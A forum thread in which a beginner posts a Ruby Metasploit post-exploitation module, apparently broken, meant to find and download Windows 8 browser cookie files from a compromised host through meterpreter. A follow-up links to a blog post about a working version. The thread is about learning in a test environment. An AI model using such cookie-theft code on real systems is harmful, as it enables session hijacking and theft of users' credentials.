Jump to content

Problem with Metasploit Post Module - no output?


-=bb=-
 Share

Recommended Posts

Hi,

Complete beginner with Metasploit, so please be gentle!

I noticed that the enum_ie module doesn't work for Windows 8 clients so was trying to put a script together to download the cookie files in our test environment. I figured it would be a pretty simple exercise in learning my way around the scripting and exploring post exploitation automation as I wanted to include the script as part of the AutoRunScript rc file.

When I run the script in a meterpreter session, I get absolutely no output and I am sure that I am missing something obvious but googling hasn't thrown up anything that I can see.

Here is my script :

require 'msf/core'

require 'msf/core/post/file'

class Metasploit3 < Msf::Post

include Msf::Post::File

def initialize(info={})

super( update_info( info,

'Name' => 'Find Windows Cookies',

'Description' => %q{ This POST module attempts to download Windows 7 or 8 cookies },

'License' => MSF_LICENSE,

'Author' => [ '-=bb=- ' ],

'Version' => '$Revision: 1.0 $',

'Platform' => [ 'win' ],

'SessionTypes' => [ 'meterpreter' ]

))

end

def run

begin

base = session.fs.file.expand_path("%USERPROFILE%")

location << base + "\\AppData\\Local\\Microsoft\\Windows\\InetCookies" #windows 8

target = client.sys.config.sysinfo["Computer"]

file_type = "*.txt*"

dump = "/tmp"

dump = dump + target

print_status("")

print_status("\tSearching for and downloading cookies...")

print_status("")

getfile = client.fs.file.search(location,file_type,recurse=true,timeout=-1)

getfile.each do |file|

print_status("Found #{file['path']}\\#{file['name']}...Saving in - #{dump}")

client.fs.file.download(dump, "#{file['path']}\\#{file['name']}")

end

end

end

end

Could anybody point out what bone-headedness I'm performing wrong?

Many thanks in advance

Link to comment
Share on other sites

  • 3 months later...

I never quite managed to solve the output issue.

However I did write a blog post detailing my endeavors and how I ultimately ended up with a reliable working exploit for Windows 8 cookies here : http://blog.interrupt3h.com/?p=286

It still needs polishing for general release (as detailed in the blog post) as well as some error handling and some better clean up but that's for the next rainy bank holiday :)

Hope it helps someone. Would welcome any feedback on my approach.

Link to comment
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

 Share

  • Recently Browsing   0 members

    • No registered users viewing this page.
×
×
  • Create New...